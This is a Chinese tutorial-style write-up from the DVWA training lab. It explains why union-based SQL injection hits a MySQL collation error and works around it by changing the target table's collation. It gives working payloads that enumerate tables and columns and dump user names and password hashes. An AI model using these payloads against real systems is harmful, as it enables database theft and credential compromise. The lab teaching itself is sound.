SQL注入报错“Illegal mix of collations for operation ‘UNION‘”解决办法

目录

一、原理分析

二、报错原因

1、注入语句

2、分析SQL语句

3、查看union前字段字符集

4、查看union后字段字符集

三、解决方法

1、修改使字符集一致

2、获取table渗透成功

3、获取column渗透成功

4、获取用户名密码成功


在进行DVWA靶场SQL Injection关卡的渗透过程中,当尝试使用联合注入法渗透获取数据库的表名时(注入语句为"-1' union select 1, group_concat(table_name) from information_schema.tables where table_schema='dvwa'#"),报错illegal mix of collations for operation 'UNION',本文分析报错原因并给出解决办法。

一、原理分析

"illegal mix of collations for operation 'UNION'"错误发生在MySQL中,这是因为尝试执行UNION操作时,参与UNION的各个查询结果的字符集(collation)不一致导致的。以如下语句为例,需要保证column1,column2和column3,column4的字符集相同。

复制代码
SELECT column1, column2 
FROM table1 
UNION 
SELECT column3, column4 
FROM table2;

如果报错"illegal mix of collations for operation 'UNION'",通常是因为字段字符集不同。例如,第一个表table1的column1和column2字段使用utf8_general_ci,另一个表table2的column3和column4字段使用 utf8_unicode_ci,两者不同即会发生报错信息。

二、报错原因

1、注入语句

当使用-1' union select 1, group_concat(table_name) from information_schema.tables where table_schema='dvwa'#语句获取dvwa数据库中所有表格信息时,产生如下报错"Illegal mix of collations for operation 'UNION'",具体如下所示。

2、分析SQL语句

分析DVWA靶场SQL Injection的low级别关卡源码,如下所示。

由于原始SQL语句如下所示,查询的是user表的first_name和last_name。

复制代码
SELECT first_name, last_name FROM users WHERE user_id = '$id';

本次注入的命令如下所示。

复制代码
-1' union select 1, group_concat(table_name) from information_schema.tables where table_schema='dvwa'#

将如上两个命令结合,此步骤渗透的SQL注入语句如下所示。

复制代码
SELECT first_name, last_name FROM users WHERE user_id = '-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='dvwa'#;

将这个语句在数据库中执行,效果如下所示,同样报错。

这就是因为UNION前后的语句中select的字段所属的字符集不一致,将union前后拆开后如下所示,即 information_schema.tables中的table_name字符集与user表的first_name和last_name字符集不一致。

复制代码
SELECT first_name, last_name FROM users WHERE user_id = '-1' 
union 
select 1,group_concat(table_name) from information_schema.tables where table_schema='dvwa'#;

3、查看union前字段字符集

首先来查看union之前语句的内容,select的内容为users表的first_name, last_name。

复制代码
SELECT first_name, last_name FROM users WHERE user_id = '-1'

此时在navicat中找到dvwa数据库,查看user表信息,点击users然后右键,如下图所示。

右键选择设计表,表格变为如下内容,注意SQL语句中的first_name与lastname信息,下图红框内容。

鼠标放到first_name,此时下图红框体现其类型为utf8_unicode_ci。

同样鼠标放到last_name,发现类型同样为utf8_unicode_ci。

4、查看union后字段字符集

我们本次union联合查询的内容为information_schema中的数据库为dvwa的表格(即table_name),这时候我们看一下table_name的相关信息,如下图所示,鼠标点击到information_schema.tables表格中的table_name,类型为utf8_general_ci,如下图所示。

复制代码
select 1,group_concat(table_name) from information_schema.tables where table_schema='dvwa'

三、解决方法

1、修改使字符集一致

为了确保一致,将user表中的first_name和last_name的字符规则修改一致,改为utf8_general_ci,如下所示。

2、获取table渗透成功

此时在SQL中再次执行语句,此时渗透成功。

复制代码
SELECT first_name, last_name FROM users WHERE user_id = '-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='dvwa'#;

注入语句:-1' union select 1, group_concat(table_name) from information_schema.tables where table_schema='dvwa'#

可得到数据库dvwa中的表名,分别为guestbook与users。

3、获取column渗透成功

输入-1' union select 1, group_concat(column_name) from information_schema.columns where table_schema='dvwa' and table_name='users'#,可获取users表的所有字段。

这步能渗透成功,是因为字符集一致,完整的SQL注入语句与users表column字符集一致。

复制代码
SELECT first_name, last_name FROM users WHERE user_id = '-1' union select 1, group_concat(column_name) from information_schema.columns where table_schema='dvwa' and table_name='users'#

4、获取用户名密码渗透成功

输入-1' union select group_concat(user_id,first_name,last_name), group_concat(password) from users #,再次报错。

此时union后面select查询的元素增加了password,查看user表中该元素的字符集,如下所示与改过的first_name和last_name不一致,如下所示。

为了确保password的字符集一致,将password改为与first_name和last_name的字符集合一致,改为utf8_general_ci,如下图所示。

修改后再次渗透,注入成功,可获取用户信息和密码的 MD5 值,解密后可得到明文密码。

相关推荐
薛定谔的悦1 天前
共享数据总线(DPR)设计模式——嵌入式系统的“内存数据库”
jvm·数据库·设计模式
程序猿online1 天前
本地mysql密码重置
数据库·mysql
四维迁跃1 天前
如何排查SQL存储过程死锁_分析死锁日志与索引优化
jvm·数据库·python
m0_741173331 天前
如何检测SQL注入风险_利用模糊测试技术发现漏洞
jvm·数据库·python
2401_846339561 天前
CSS如何解决Less与CSS兼容性问题_通过配置文件实现平滑过渡与混合开发
jvm·数据库·python
qq_413847401 天前
CSS如何控制全屏显示的元素样式
jvm·数据库·python
云动课堂1 天前
【运维实战】MySQL 8.0 数据库 · 一键自动化部署方案 (适配银河麒麟 V10 / 龙蜥 8 / Rocky Linux 8 / CentOS 8)
linux·运维·数据库
阿正呀1 天前
CSS粘性定位不生效怎么办_检查父元素高度与overflow属性设置
jvm·数据库·python
2403_883261091 天前
如何获取DDL语句_DBMS_METADATA.GET_DDL提取对象定义
jvm·数据库·python
m0_613856291 天前
mysql数据库乱码如何解决_mysql字符集与校对规则配置方法
jvm·数据库·python